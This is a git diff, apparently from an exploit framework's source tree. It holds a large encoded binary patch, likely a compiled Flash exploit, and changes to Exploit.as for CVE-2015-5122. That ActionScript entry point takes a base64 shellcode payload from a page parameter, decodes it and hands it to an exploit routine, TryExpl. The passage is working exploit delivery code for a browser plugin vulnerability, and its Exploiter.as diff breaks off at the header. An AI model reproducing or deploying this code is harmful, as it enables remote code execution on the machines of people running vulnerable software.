zYT<?NA6bQ3U1e>xLr$U9)znl9r=Y;S!c_ACDDHG=_<77KbOCB5BFVWHt&)?PybleO
zKH&D_aaaVet#cK!LT_PF;l#oju9=000W1iM!SvbB1Xi+m?Fj}xREcoaCb_3Ge_{BA
zF;5s%g<%R~kub`H0Y&V9Fsg-7D~!cL91f$uIE1q|3qXEu41osOh4m6v?kZj?Dvr@r
z1kkfV-3c;Qt?(Sp=lsjfgTW3y8OzftKn-fshOh`Kk-H7Kv)Jr8xaQ)Tk81(0g}6#_
zmE)?!RfVetR~@b;NAM$;*4C3Of0J^NlnqkOt4D}NRsayCJHrR-aoD!-G-AEZybWL(
z<-P_5Fv^Su+}AQ2fGN_m8bF6?WH;aqBY@0wGZ)a99_9uz)5|>hgw@0;ILl-OSo<5k
zj7*rnrp*scqs@=ZvCWT2sE{^43Y-_urn&pPc<i=vti;P#4<b^|;<O=<e;8M3VZQ7}
z$nr1xQcKGP?S`O7`!Lldb(qJPVDiR?^;guTbmK$sjie6ow76()wLMbl9-Z0N0C!2G
zV=y0K>f`agjxM5LawgS<2dYnsai7o${qz02xSZE=ep<F1uDI+Tn<y?>B{^xKTEI_t
z;Cv)D0#d7#bOw9uCCcKof2c~+{yNyCWp4%4)s&N6>@p43@2k=Yd}gIZg@#3Ar6)%D
zPGPi3eSKuxxf`RqsrgK?rDtEpZ$C#Q5Qlh~*&6@u4(zf>sxsD7fGS%DEwHX=SEREs
z;V&uujLtr&eDvCL^1g55bXqdCqdT5~xS$*%87%sG6ECXt`Z!P>f9<y`LBHmpw0~J+
z1&89^DLc}u=3q(L4{Ff!ByI<6*FepzEbT=%o~Ci?fg6V^UTedUo_FvtPWC9c*LjPR
zJ8+1nXlJdfBRmMrLYqWPE|P4*(z%CtcAo|5{6jq8<cpFZDmZ#GAF5Pi>q`S<Z6Gy0
zRHl;aN~2A_<PQ}-f4QDa;U=APh;qcCAxedyEza482<xmnKg05p4X}>9eyR9v$LY+F
zZmI*~f{**0^+%+0acOBn_1Uv&{mS*wG{hFFJ4)N0i+Ur287rxFvCj&l9$;AQuo*1v
z7Ir0wz`XHrZ)bboDI39EVXSXnwPs_pVLz8)M?}P|-QgYfe<Erir-Nea1)UN_O`XeG
z>a?tG*@%7Du0e;}Y#)Z(Bu}a&#Osa>Mx2lt7+G=^WUq-5RJU1)#gP-t*RrOWxQXph
zEo<5&!EPE~ac-heV*xWaG&gQq-?H&IJGflm%{)YFQB})tvvDi)vDNq_xzS8@Ae)4?
zlbcV8bYT0qf3LUf5V0rTB$SGLI-UA<|7^m>rqwIg)HfZfA7d>^jodNlELacKFP$~+
z{&?sTOjT*@(DuqYx5r+>rZ7d@wpm~>rY|0;_>2|Mf%Wx(-H*H}?t{GXsJoTgA1PjE
zT*w}{p?Tw`wKo6pp-Suwo{ZkDJ?kUU2n;NAMB)n$f01KY4M+w~d>1(DcxP>x_9l?o
zOmLn#Y1pjEUZ>{hOTZ?GJ_J|t<PFCJOS<Bccrz>+2_-wB9nBbfvT(-!>}Aax+t${v
z2MKLkaAotcZL8KaZCcsf7OZdFxCWL3);F)))VyKi3`|@55F$EJIHT=Qvv|r#KU7VO
z8^?zVe@@h*DYFA~kWU#rR0GMEkdt%I*x*N7$tls^rKvweD<8U24wVi0+DT+X=1ERg
z<%dYv=@co$Nvo-?D%Wc2Dykvs%C*|E>VQ@oz%sG6rlv}(#c_{TS5{qxkJGA(#OG}t
zbUL-VYTU1@q5B|BvOjV0r3&gMsCAzjfwO`%f78pVz%&H4b?`Jfn(P(O^K>WY52&bD
z*Wq3OhAJRyD)3A-;vf6?t*)u9_N5LC=$8h{%5fmx)3+^>94_#!D#yb$wZval2kt4z
zs@ht;qO1&2SCnCG1WAcilvh+#PupKzrHu9cHbKh$(iAswT-6ZM71*P|bX6XxI>gK`
zf0uZP*^S1i)0UO{%arX$V_iO$vh<RF>ut1QVSbh;6MKrEJuucQ3qMQDvJcWC<sj?U
zu@XdWW>gA)h(T(XnBHLaw%=#UOmb27nL;O*WczLL@s;l^us%~*=M@06HqPAKd5G8Q
zSZO~~{LV}D5HqM9sr@oL;<L16V%^X)f3|<*bWdn=*VGb=TWuA_5)6q|%FQx3VP^s|
z0JU#0wpEe4wi*Ge!I1_DixiMm<s@q=;8RmpQ3eThalHb2U?l6x@hk>xl?G0?z(Ezk
z!R1sH&;l54S`AXxYRW0*ippAK3RW*L*fBpKPHfRtOqQn3NJHFP<aPPzu(~i$f1gq4
zFPuAJ#>5#DYYUIimllQ!J0~oixU}%=`g3f;b4>p|oACP-<#C)~2`_ec=r=pJpb#5o
z>NaU44Gcd_z+jq|1+pID$roCI&<h0)yRm<!xyf`I6vllsg%=v)b412Gq0JY*g+eP6
z8cx0|gciX0H?+UiI+1gv$gLN-e~luyS!l~dZi~o0O60B*+8Uv)6S>EVTquU0Ao5NW
z8LdKV6B%C-T3Bf90;=r!9U?a(w5Z70EVP)=x`cL;(6$JzTjcZztygG$BBx(yCkt&r
z<iv$GD739Y+b%Lr5xyOhpvrKZ(Ed*peNAZJ5ZY<5{B{PeGjW0XOgkGFf9TJ&vv8fu
zMDF=G#s?3Yb`h>`;%_LOYs7;F{xj`LTvy=&2bu;Bw4(3f7vyIeNYJz!u#X1fGwmi^
zKf(0?F0hqpLf}kQXurh;!ZPhC5R@$v6JNv+_{k=|0kDxKw0|=9bj>|MchAw?7c$*l
zr{lyAr~pmR7!uHC&mGDpf4xYUlg348rP-w8UJbq~O$R7IhE?<ixN@;wR}#bl9}bU7
zaB^I-64z>&ScOizzFyH9avPh(wy_P$@(mj|@rK-{uMU-OR2qh`$=Luirb@$kBrX6i
zR)hE!8>&(oE+LOg$)oaGHgp+d4RzPqzm?b9zu_O)zoDDi(2clXfB7Tl{;l+D=lgm5
zQo)p*m)OuE#q~#u(DgDKx``<zf5J`i3Pj1PBnU58@@EJr@=!khf_&Kd2e(&phm{JT
zH2e+08s4N}%m1E84b*v)r{J23YZ|T+TuX2rhU;)#KV}fOk+_}29VG4~aTkfZN!&x?
zUK00_xSzyNN&Jk&f6qz$g2XRLJVfGQ5|5C0l*D5seof*xBpxU6B#GaVc$&mBB%UQP
zOk#w@D2ZJpc9Ymc;sp|Kk@yFRw@K_JVUc);#J@<qOX58e|0eN1i4RD8Na8;vJ|gik
ziT|?yF*f-Va(*hELmbZ2IQgDV&NHO*OmgnzdZumJ&^s9_fBS}-y;R9UAI+%8R<aJ3
zFBda%Cc6t1&-AHFl?~{jAnqyyaOCKv$}B+W+_RS|pat_3Heid{J8h{_0^<O_wGG&6
z&M0nxS%A#xwqI691Iz<t&#?c>DQHl#Snf>wue{C%Fnr}l8k8JXFl8zArNU@~lFN$f
z>y<n<VGc2We-&>g;;)Iv5b@Wf^~C!%8H8aI0MR7guc=)``!($(qWvlXh1g^^eF?Dv
z;~*U0e$A*Q)~}gI5b2k{tzIc%v%uChoy}eizArXsg9}Q@ezjN@Vs7D5C0Akd{C3gi
zgX(M&>zkduWvP;*um!z#X3d_Z0Nt>K{SC?-wy3`mJYc0L?|(d2hVss5<tXO@R)O-F
ztP<r~$O0(JB36ZLma=LTsEpO15ap~E*{@)A-StW(Ta2yzAcI*1ruZa?2bL0&ARgd>
zl$pvb1z3Sh0_`l3)(Q?gJO|ba_z_2LXi`+Zv>ps%8gFQ<N(J=fjsbeeRAdp3l9$+k
zo+Z}dAs*yVCVx{&+e})Lq}!|McDAyb3>V1T2HgfOQq|_+_OZ}uJf46uQE=eU+4~9f
zN65Rvs{k?+vhUyl6eOwOY*<4?4hBOL2|6;EanOw^i0(2VEUX*Ya42i`iYyk(wyt2L
z4|ydWM+jo0c$sh*w@c)TYfs5gPKO2tln$7W&+C94@qcXPcAzpANF0mF?`FWbgz`s%
z`3xFp&;n9A#BenGbeQ5k11IccYkMjvDhRr9FJVTspE2uRwkwnq%{iN5w(cX?N`Y<b
z{eG5>2^P>6cokBT*3SV-84VV(+-d?BRqDTB)-PBnk31)kMF7eYz%Bp@B%ny`1^_ZH
z#PSfuQh&T0d8%;XWd;p6mrDQxL)O?`Dom%}O2vF4wU`7sc>=jy1e?QqnaQ7K)>8}>
zu-kf?3I?4!6wJtmofA+dK<7>ttVVs7S<j{xX&78w*+_iih}5PVMMfx&T})b+f0~g-
z-h+-t-W~>XprnHNdlt$WS&_pi<ck!+=ty`XfPXZhNu%INL7v@XP3a*!%~O&4(*Zf5
zOrOqyc%eo-iw}>)rU12qw)8SI_;iE<9ab5%qKBhXw-GZ2eyMhejtlLIn0*v569Iok
z0UtxaY4FWRJpK&%4yQd{JS6PL>E)Q2c>EO#_!<IEhi_KG_h01u9(-rOH#^~bCX`7*
z-hVV4oeAF@@-0CIzD2&5z!y2inIPpf$s2}nxrwK*r*J<&xGC_>qsIJzQ$gXqmz67b
zLOpc@Be{{2+@z8`TKg^JG5Qm#^%FcgUE0pRPhAFfBbeQuP8z__C7ca4-(5Df(ZlL6
zAaiq|efbDNkwWhj^Z4LgbcK8kE%s}8{(n{tLGyOXig|2k9=hujYH0q7`O46I^vWky
zFdaRmI)rb(Q%6wcr0@Q;>QLM*kQ8^}La6d4%p2hBa~|o8M;A)D2#9+Z9vMMYqv2B0
z;SH6oC{sY@294cld9(r=yP?WxC22=i1*?(MJ&ykiwto$&*pmP69sd{AP#yF(p?_Yw
zMEbwv`2Rr-9Tq(-diZek2<Z=HUm5?)l0hoEG~xdW`L~1RBUq1EUsci1@>ST8{R0gq
zsQ1eHe}ihCkvs-`KwueiYGsf0rn<}ed!kO>O4i9g#@C5?Dl~g{-AkIvpbOe%o;o|+
zY`r^H{C_*ydw*Q<KXCj%99R7RIDh^hjVtEIj{kqh74sAF2N6RMh5VEXSwORA6lFXU
zYP?e8cZO|z{d`dFd=pxtU>mGQW-o?wdTu^kmuR77q2;0F(dE&W70UrF1)2<+y(MV8
z%QSHQO}8$mpPAMb^fLp>z4)1CT`d`KsH4*W2Za&lYQ%}us3+VAW#ko5dw;)~LKT6?
z(0vDW{M#wmod{MAm428GxSO2Oify^4;F){vKdhgC;40BojzYPhdn=pxe%oJm74rY7
z<Nq^ltgDd!1CIaCwXv>3{tr6-P}T+6nB7&#A3C{+f91B^naIRr_8(^1aCB9W?*7{G
zI16*#YU%U1MqC@iWydS?pMRfUwxEYiaWQKc!KUX<Lk!Q+1EBGmXYEb|WGMmvC~s5U
z{3&spr`-OtUGsm@mZ?{;-?C@enze5*i+zCKo&1|1A6~OonLurP0;=;(s?N7i)$0-6
z+cF2#qW|1ai&_-#RB#aCXSVe(yJ0~@L=F3%-LU_*8}@x_vSQ+%gnvzU!}=I$>}6HT
z$C~6H!h}b2$|vYeLwL_5CYn6*JWXF_ouLnhHmum7AgwcTf9goM*xISfdFw3tnQ5I(
zKQpXzblHv0)04e#W1{z+KjybM;djB9-=>7$g*M#|jO5dD;SwE{aj8B$|M}?A5APls
z4Ik~|Xqd|+;SMqTlz$`8)fDKvcA!Vb0(}ozJsQ&`b=~jl!@*-vpVvqV9++5jUq@Z{
z7Cc!pv>avy@MUw04r-!gLGPx5%05K6*RxS#@D3%q$R4MQsMb#@ShV<ZdX<qHHhVy~
z9?(O}t)D|+^c_1AJ#Hj={EFo&lCd7tfszcLVEsb=`mJB;qkqts4xeZ}gqj$Yqx50a
z_oIjuo!9QKG=V<mc-Z}we12{F;5QVChN7+3Z{X23hsa#3^?BBl_-m?UIKoJb636P(
ziQKdKW4Q;*5w+gvSUV)!YnQ%^PbsZlv-TxWN4$rgs!So)sWqsz7f@@m#$Es_8%2Im
zw_c<ozhoDAaerEo|Dc20^#qjpkL2)&{npFLvi^x$V=6^^45EEK5$)@Cw13k<rG#kT
z++VbR*GH+2DrD4eCH|o3|B;OTZHj&xMIS=+|4KyvFFX48b?ZGU{xs`-O63DPmGt)d
z&}py#IPLWjmEkLBuaA?7d_swo(3)rx5;;S%;oQiSGk*+grvcj#v%~GySq6ekr{3C)
zAm_^<=x^s^J&W4=wqbqKkfY~fP!!27S0U@^+lDiP)7YTibE%P1=F1X)P?@g)%M(o(
zR~d<JbTy?pgVKy6&1;ZmvY%grbZ=qoM<7VG)BRz3x?pUQk=<&HP#3;OQjYu>nHd4i
zBJv^0Hh*qUWbRleb9W|_zKfEc33RK5H!_@lT07<-7tbIU*04cK#SscKYiv<Do9GtL
zrm5*-seHIdxmeQkAn0YFaEWaJ9goaSbmMTeJK4>zbUd-581uZ!@!XW^d9~wtY^vvX
z9M6_i&+iIkZBAmb_Xx6MJ&Lc29t`lg)Xc@mB!4J!FaogI@q_>^4)WJy{f-`+M~`JA
z!1MIj9z3=sx)u-4PxzBMr}by)Ukv{R3IDgrf3NiKfWMjW{}1_pEd2}MzcAsy6MB`_
z*&uM)677WlqJ;m&<o|8yABBG@Wq303a}E4y!oS8vWHHe#Bf%I}1lN-psxloUHy6@u
zcz+WDp_h=ZMY(bllr%Rmk{db6P3lc9;)scE32sJD14~S_*X9zqQ+js6^DY<qaWCj#
zWVv%;l@Tm3$yWjO6q@3)zXSiD%P<|eLvVuyhRTuK5BIOe!Y8Mq$K?HjT<m?(h|wN*
zSx>l}u|e+=%Chw&NOdTh2&S5+l5W2Rs(+Ye?Yf*=K@gKz6eV6a*;w>i&r$r)L}}N8
z^%~yrR4e5iEjb&N@)FhP9}%Kg5-0qL!Uj)5VPA3KUDs>9MxiU{<vobdf2GiG$}qGV
zc#B-}JwV-7E;Rm;^rB8Hz1~iGQJ0lo|4e#Ohm~G?lU~$arI$r%S0>u{W7)=-Sbsit
zS^q;(M`WQT8A|{_KWv#wwE4`?$!X*b^zF5ig$8WTB>xMMxp;BwUn~?KcZ;ZDXgvSY
z2n~)!rA~=$fahr<v~^r~P4dDR*4L2Rhw|UUssh`5L<<v<C{X7-Mjj6)afP*GC{YK}
zB=3JoOrd?wtk_5Qt^~Rw2|cxs&3|nOmTn)U%cB<uao_+6nm;ct(Jtl^`(Q&B14rcA
zAV4OEIPp$F;EbJb8}^}xXtRH(C(*R2^^{tt4(2cclGjLMF9qY622UIe58%X$G$!p#
zr^RU}NJnDcl(M*!fr&O|KaT+j(Hluad)Y9VLt+7O3|j|^0Gzi}msJL|ntz&_Y8>)P
z^Wyk{NpS)$!?1XD6@e{!aiCjK1MV4|CXGR891!F|4{PYyH&ChKVA(}SG2on;Qi$W1
z2>=PhzAl;I)nSEKs2-vE$PBMqC>Wr}6G>4}olKN7D(vpU=q@11xkAkoYQ9hl$Of;0
zBb9PtR1!j24PeI~j5CVc<A3pb-M->;3=jU1QZk{8a|mNxSfuz$@V$qR76kRpW^?A^
znulvXt_8SETnlk6!c~f^3|B=Jn^TS78kSk)#@4JRmXbAB!?jfLVf!|}0ULy_!Y~lT
zZeWICHkCFVvDXK+K)j`cDh`MMY7S~{Y}%-LP<LbZMKgkio3>HFZhu2tklf=XRchT>
zPA?L!<k<U+dl8_im75|4{UH~Rw5p~%hEH#gx)U6)rZ)!NGan99T6HrchWARQ{x}Hu
z%&Zu_|B*vOY<wr%dJi+xUY4W0hmEgXEH<I$$4Ta^Bnvc>g*wS1<2{B4{=<lCjTFdQ
zbSPsDw;M45T`Vxc#(yyP(Ox14z+22j&>Lt6=!e(=0vkDI9{eu1ZsehiXhz5v^$`Ud
z6vhovhM?G`DucnkP$r42XjUjYnoWC!&_^N`<xpNUZ#ar~asG--+IqrvEz{><PR+I^
zgY2_7T3i+?h!&KEilRkQK$izIUncI`+B|>9rdRsRw>}c@+kZOH5s{NZa_*a7G&YdZ
zLVU^DFNr!+TnS)_Js}=wK3w(%XS%dZf0?;%)&VM_G%bbwO>h}$A;#t?;=gj{sI(BJ
zUwoFTDXYRPRfky$Gm=(YRas$AM}VdTDn9>ggahNMa<#5J01aL_8BHjhNK=uPpFR~~
zrm?3P`z%))2!B_z993o=GZV~y&vF-G;+c(pZ_s~2xLiiwIr`YVlR*jrxk?rtN*ao5
zGMh3L*EC!uxTfQpfy+OKO___|dCZ;THlP8aFGXmkWrt}>kOvtyK~@lo6ZV{9ICF|Y
za|)dr(Hvq3P0k@@_8gMJkCifqbdJp-XF79;oGXMOf`9M$tRKm_B18ERW`j&dGK-VU
zR!Qb)By;s2F$Bda!q_YUWmwD-x^<VF9iTKJ79z+9V#D5e$V~!9LCEAU%?s9ZFp-QY
zA~Tvf9MxC2iEflkMac2)v!-Gf6|+GZ%@SoaMMz<fcQ>N7$GdNAygP7v7?Ic!hb06D
zDd&Lk<$u6O15Ba!ZX)F3{e>(X?CW2N?%SPqGp-c2_w@}z?>`I%sRR}kDA=rctZ)0O
zzOC^{<JJLitjz9+LH!@>NyJ|i>5UA;TYA?F#v%jh(aj>5Yk06DhLCb*+Ss?BP!hH7
z0X!F+B(S#-U;B9{i$qD6q^0iE31$tcb7iY3#DDi&8~d$H+y2DC*A~^~&Xl26SJfoe
zMQTlXnF_F&T3b=$tQs^zh{04zd6_q*W%Boz-*j^&Re*Ns&`vId=>Z(1NwzxZEOD4E
z$rfA}JQoH5$b<=Z30^4hCRQi9Cz25p{IB4c1iyF-XJ+Bb!Ig(AA6EgcB3u(D(K+j6
z=700JHF~8882sjNs7pEiX8KZ<MyXh;;YW2X1=AYS+)H7cnd#o80zU?_B`NEKOT~~>
zHParFg{?5S9L5mR*aW=W`9xSbR&hR!MGoHY`YhN3FiaYb^y%)<!+ET7`-N-kvwEz2
z(8Hx#+3~&OaYn>d*g#8v0}}Ld?Cpnw-+#r(sERX1C+~jAH=kPHgd<ZR^m5>63$AJ0
zw4rTP{c7+=t<QpQu&-k)SR;GGn<E4H^=sFzY-z0DNPI1gYgVmY*}SniFGVY$(ZOVT
z8#Zm+h%ilSj#=$#-#R!*3Ip4Fvm5Fgk7_%r`8ZHiHE-C^+>}W)X-7qNtQ~-ITYsd}
z)3_WAFwJeCsUjO7u*T8c+v#&WK|!^Cqu2J{fVKFbOWtT%y^O4c$f29lxV||(bJ-n0
zlM&iFk+b5)HLF2`wXtoVphXU1y>Z+V8Nh{aShK!u)7mCbUHO2H$852wA7H$Q7e4iE
zcK$qs&TEvJ))9a6dL6jH$beV6+kb-V>sK}BMH3C$Ot*qGJ2>|xzm`WnfwB!oJk7_p
zY;2Rh?#L-!gVHl!LUoU6S&eFK15#IVZ{<>?$8_~}_HD247?ea+g{k41niC=O$3iwm
z0O6BiwdE~M&04Grc1~KFRyJ#0o!yZP!ssX4*GCZEMD^LX5+8^1R^pSwLw`@T)URwg
zzS$!cZzMOCXjy$U{F<PEuniuag5c?BGeMw0%%Rz<npba1>k=S#**exGe5*EX1ZA0B
z$KIZ;&;_$AxoCC$(JjmB0av!Gsm+PFpf|j&Yjb$8Z$Q==&G|^CaD3<uczX4+{Pe&Z
z@M!Pmg4NB(Ai<WEO>HUtJ%6t^vb{0Z)!kV?rUa9LZah}%3=r#$6+9F7C`--jF$z{U
z(@lwk9B9JVSaIsjM!R<abY0(cTwzMM4%tK2lOjv%*Eh5;K;yPPE7_aY!-P>}Kq_S%
z-3<FL1gynhYcUoaYcL-BFFCMm`!F=H98Y^-+1_$sWp8L+*^KT*gMVBO$gDVYT+v}L
zjARGbHY{Irj7Bfe0@+2KV973%7pFdKhfVYxhlI|Ku&sqg$ofrd(YA#tfm>)?3~cR3
zD`#(9U%z@oaLxKviA*H9x$KDT0O)earYu614A4c{l*P!DG1vi6V;N(&QTQx-I4855
zxmAwnL~gxUAvozad4B*JwUg}BWnU(kcvq(n?oG`U!76C9z-wy+PxoM~eBPJ6J)tiN
zCT53&d=;cD(UZYTldf@#eRuN4*czWGMaREDzQp<-P)@C~E>NXaRRV}!T@wKEoXF9j
z!v+9%8Bplhc&H#cp~`B)hF6sZz<LG<Iecnrfh8@kE3W}^ynn8)28d7G1`@PVqDuqS
z1pcnBtRtjpO*JHl)T%*3R0UjmWo4iYghT;=-1W-pa(q=()>KuL>y@>2@DG$#AY`Dt
z26+fnmRFJlmQ@cRx9|_tRMkP&VzY#hr~y3yE+e>WYpVfDEJH4IU|j(Sud1j6Qya9w
zL4;HV+e&Z){(lMyjC#3VjgWPEb$JbtvegJurB?%3TdTt`Q%!|l4cfSXUR_%U1g*UR
zL!jBR&$Q)I4P1V?T2q<)${8pelwUbVq<`hu8!mvg+MhdxQt2BzFR;&qZI=?E&JZfd
zjlgUKP9qQ+!CccKp_WOrOaY-*3$<3Li-mfaP>&GmQWK#z2(?M5L7^@e>WYL7r?s%*
zB$Jt%AAbT=)h$Bp7An|{whHxD<~|u8S+|iTIs@yrKvh-mIh;PRwsiL>i{n_+7)tdv
zw*3@bJ8+$f>#Ml_57*aleI3^~a1Akt(@307;tUdJlGsV&ED~pvIETc!B+esoK8XuR
zTu9;~65k~8EfN=#xP-*FNnA?eG7^`QxPru$B!8|VaW#qWkoYc%?~(XEiEBt)OX4~b
z*ORz`#1BaPki?B7ZX$6ri64=;g~X59?Tl@|gPeCVR=t=$AlVZ7a;yXlF31ATZdAbe
zatt_Mjsa&kD&Xu!1!y-)1VsRV9m5rL1@agZ?w~tRz+luW=m`{on%Nul28tQ;_=3K`
zBv`1;X9P0>QyBAQ1~UWGz($l6%nD2g|50`@JAfmqtejv@0LM_-xxw53&U|w6f_VWP
z;^gKB^8*VQ%PR;L1aRn*Ul=S5lrmOO6f6pqGgdeuI3Z98!&{RKoE#Be>EM*W;Q(Py
z4NeUl$?#<zlR2C}f93{)a|0U~wg!Xq0-G3{J3lx-a13Mf76carj$>@T88ibYFt%V}
zaA6?Cn7JspDA2~(!qQ-AAk5gJvS3-DgR#=`V0j?ISXo7|BCwgU^2%Ukpo_tBkjkp*
ziygBb8cNfFV36B>4!n@I{p!cI{o2Mp*}por>vu)UuHQY*H?AMP(+zN)2s0-p@SQH+
zVy!MSFNX7_eAn5$)om8UU?Hi{eFJaxm_;$riA?Z3#9O^)aSUdSlP;YW0>G7%Mx7uI
ztGU^)tF1ZatXK~0VC9o^ogfW>m;Z{^T3{}W6#$Y~lcAjye+HI{p4D3?n3XYnD+MOJ
zrMDKFRk7l|tQvc}trN|f7(SnBC;q@_on+R<ChcX5Cp~PmPBxds@I`gl<Ubg#Q_RC-
zQ(%y3%7;elRP)FfKC+fh{h!e~&8&}2+shiJT_sve%*I&BUe;9debGAIY>rI_N6hpa
zMC%N5S!@P)e_>`kCR%5jEwP#4f|<EnwEE4XV*b5srT^ceb(Xm*hHtjjvo3bE&NkP?
zW`mw(_HC}#Ip(_99MH4OdBW8?*W3`Bi&MV2e{r?WGdIQN0jxIfG<WNK^BCfwId=ZF
z?$!n7al}D${DOzvt)_VbanPJ-zT|FQXoiS`rgh;*f9}>rW*c$Pd}Yy9p4L(`94p<+
z+Dm`xX)QB5V(2@aWzTzB%gsovd@qZZzvF4GFgM3QSQV?d$lF?JcEu{`vr+?^YwkNI
zSvP_zXD{2L+=y21W+Z#~jb7aNk(c&#T2$*6FMV`^dL8GRCs{v1c<X*|s5(>=tqIje
zYY9EHf1;Y0%xT+3n~rVTldOrM!$OBg4=)QXjxLshc5GtRxMOeF{8=PFPstci>AuE*
z5?eLPlog+M1w=6}**8Wkgw|laLU$MMdzY*X9pKhtsdsB@Fk>HQb!7Yc4J)N#*Tjy7
zt?KvxY3w)-liI+?95`Qx%yLU_9O}UXk^N=;fB%<wk?Cb$EWe2lmCi)frdpIpF*M<^
zKYK`hOdW`KH-E9zuoJP?`GTSZ({;{0^p$68nS0yX>NixjwJq8f=`fDQM@!#8!VHMO
zb4~b27oF0YM7;hB=7emA+U?WwC1OZ#X&&trpzV#<4{Ubfm{HpLgjVX{)`8x5;}=T>
zW!%)=E!g+KC)Fu~N%nbX0c!6ArtDB2_5~B6&5}q4PE8{NPz#I@3G)~1PdGXy6C#oh
zTyEJoUo(rpSkAi8-?T17xbllVKOnib(W%n%M224uFz4)NMkIr`2MArT-x=y)TeFi9
zq81O}<0!f3Acv@iZ=iD8(Myvyq9A`Awg^nk*45<f(}wsOtg4W^;TleDDhl^stI$R+
zuh@^39u?YvLR!1ZF3c^=cg@F%O0i?<3R}iFQ`Yi8_But!i3OV~*fhaP1e+y{1=7e>
zr7)_5Q6r2xVJs2G;leml81*)XD{RUF^NsyhY%F8HmkeGp=&^9-h6{9=9Q%LKSwk6_
z3NJcS;S<i(6qnn>rkumP-r|XqCM)h4XJSR|ADXGSXCtuJJ$Gp49DtngMZ=U#lPz3?
zs}xr`t_oZMT-CU0aV^Gm7_K95EydM<s|i<-6+zo4GXu7)NcBZpw}M40Shvb(#7UA0
zyH+@J&Z;NtR@tPIWWcT!tXqEp;0)_luxsUEZrHVgb*lnt-Kvn7NMWOtWw9cxSXl;{
zx3X<}XW`B7*!G?lnn32Qikuhyqf{v<1~4c#s3D%N6g=)=CSw{pxf3wmz>X7eA9G5|
zn$NpDaH4lmBIyT2SR<rbud~4y=|T3Je`g{**oafB0u?D>ko_8qQel5g&OXlY$m0y0
zUvN6VP`yA5IA<25&4`l(!CXKUxO`0I_Q?dJlL;Rf<>(xQ+6NENc|(T%J(1taO2Tv^
zmwKR}S;g?d3BG-xpjo*gjYw6?NRWX{^&QP=$i}fFHhaehC&SXrL1LjcJqJzaYz8^E
zzT{cLXS6G!OvgmARvLe=p)D%A%^Zb%CnNQrw~siRXwKsY*+R2dekuE4&LfH18Mle%
z^b?QV#Azl_R>FwJ*rr+<CP7y57vEAVuM7les;+hp$}6FeeNcps2CeQ29MFNE+CCG{
zD=d(^Me<~g;5qg_kv#s^uvLTuHK298r0A?pcIVoAGn%65x{-fzj!K&|KA#(8+lm+1
zdhE{_MQlPbu8FuN;hHj)O_+w?5+=Oz#9Ngo-rPs~7Sw}-WI~TAK+$NlZ-MV+LEp>Z
ztCQc$#ru3N&$mC9sjE{i7QN%LmQf(LvJ7w;2I1upK6M%H9OZoEtRkf#)mlx%0mhIG
z6Zd-PsT`%x>I;7fT&}1~D&*n7&FUYHVoysO63<%$wxMe0)5nERpA0e`Tt)}nQpisq
zf%xoCp9{t;&C=Vv)LBO+hSAcj#A`mWz&yHn{RV7H&yNib_QUwn_U+pjg**G&BUlXd
zlwudKx-^PzkB@;;xp3+YcY6bisuz_ls;I0eD_4&EynTP4a<#-s96jH_G8_BX8U1~*
z*0m$p)g8fKMrYS%SbcKEVDyP>IJvsw8@e|4Mml}lA_HB~9Zm9fQOaSSy~f=rQE#Hn
zjx)0@EmF~D$LelNMC)!##GBEU8u5g-1H_zeH8s;g?m3eI4J^5UatfEI`f+1abVj1#
zt=)qQ#s_~tK$-;8ORmilQQIY<Tf`lZmTIDK`@NYcFWn@-VcL`So69K;g-Cpi>}R!e
zh=&uOm-_@uYY|FgpQ71qN4E$?k(R;KHlhFre;>kdOl4VR4NR!gBvoBkht2<L;1J8P
z;>4bQtrnmY0N7HMw(Q`-7Q6<d5Y<>cRzd{I16qGIAs4Ib;D<R2)*q_sY7<{(pJjJk
z!-+uv*aYZm(sZX6mdMGjnBKcAQ?M+-vdI7{Hqcm}U=jwz?5*))p-m^~4|oldlOSOi
z1x=CK5^RLKm(X%a2N2PVe?FhL=p2!-b4nBAM3^L?sWC(GP68GIMo+!4vh9P#(~N1b
zB$|IQW2iv!`r$hZzOylV>Pr3`Hg_Jb`M4I~GI1@$wFp-!t}<NZxGHc};=)$z+$vnv
zxN30K;;O^7_;5D&2>c$&3X9xWtmXj0=*7|iR!*TBt;s)B7&}!lg~~tl9I}XN7&g!m
z<dUc_&r&5rVQx3sNA<WHv4Zqs@<ueiJTiZin!)8CnLtIlQIYb=Z0K%#FsCw1>t34H
z8Hny_I?v7X(R{Bt%<!qo)h<o%0^GTdW@Dk$5nBR;n?rb12(Jd=(;+g9Is~jIwTDKi
z3UI4wcodU*^YE^iW(8@6*YPT7*JFmY+(t6C*g(b=AY*mMJl0B@{t0m5Lp(8Tbe(@h
zC`PQe$S(taUx(iiRM|9mBKw+7m~N?Q4ejbENV{!SZ1TO808h8Umk>>ol$v}WBj4Y^
z*8^YlGEJWV-`~L(@Jr=)%z6e;D&*u@TB=E7=JeES^wjHkiniIXYj39uY$j9|;7bPT
zJqh2730wJXz%U6p2@;=#?eiiaCsQ2olCeU>OK&7!9<9&8!P4E=HK;6w`~Lyq*oH`d
C&O-(O

diff --git a/external/source/exploits/CVE-2015-5122/Exploit.as b/external/source/exploits/CVE-2015-5122/Exploit.as
index e80733e3f0..f35abd89f2 100755
--- a/external/source/exploits/CVE-2015-5122/Exploit.as
+++ b/external/source/exploits/CVE-2015-5122/Exploit.as
@@ -11,27 +11,24 @@ package
 		private var b64:Base64Decoder = new Base64Decoder()
         private var payload:ByteArray
         private var platform:String
-        private var os:String
 		
 		public function Exploit():void 
 		{
-			//trace("Got to checkpoint 0");
-			if (stage) init();
-			else addEventListener(Event.ADDED_TO_STAGE, init);
+            if (stage) init();
+            else addEventListener(Event.ADDED_TO_STAGE, init);
 		}
 		
 		private function init(e:Event = null):void 
 		{
-			platform = LoaderInfo(this.root.loaderInfo).parameters.pl
-            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
             var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
             var pattern:RegExp = / /g;
             b64_payload = b64_payload.replace(pattern, "+")
             b64.decode(b64_payload)
             payload = b64.toByteArray()
 
-			removeEventListener(Event.ADDED_TO_STAGE, init);
-			MyClass.TryExpl(this, platform, os, payload)
+            removeEventListener(Event.ADDED_TO_STAGE, init);
+            MyClass.TryExpl(this, platform, payload, 1)
 		}
 	}
 }
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2015-5122/Exploiter.as b/external/source/exploits/CVE-2015-5122/Exploiter.as
index ecbf56fac5..591cdce944 100755
--- a/external/source/exploits/CVE-2015-5122/Exploiter.as
+++ b/external/source/exploits/CVE-2015-5122/Exploiter.as
@@ -11,27 +11,33 @@ package
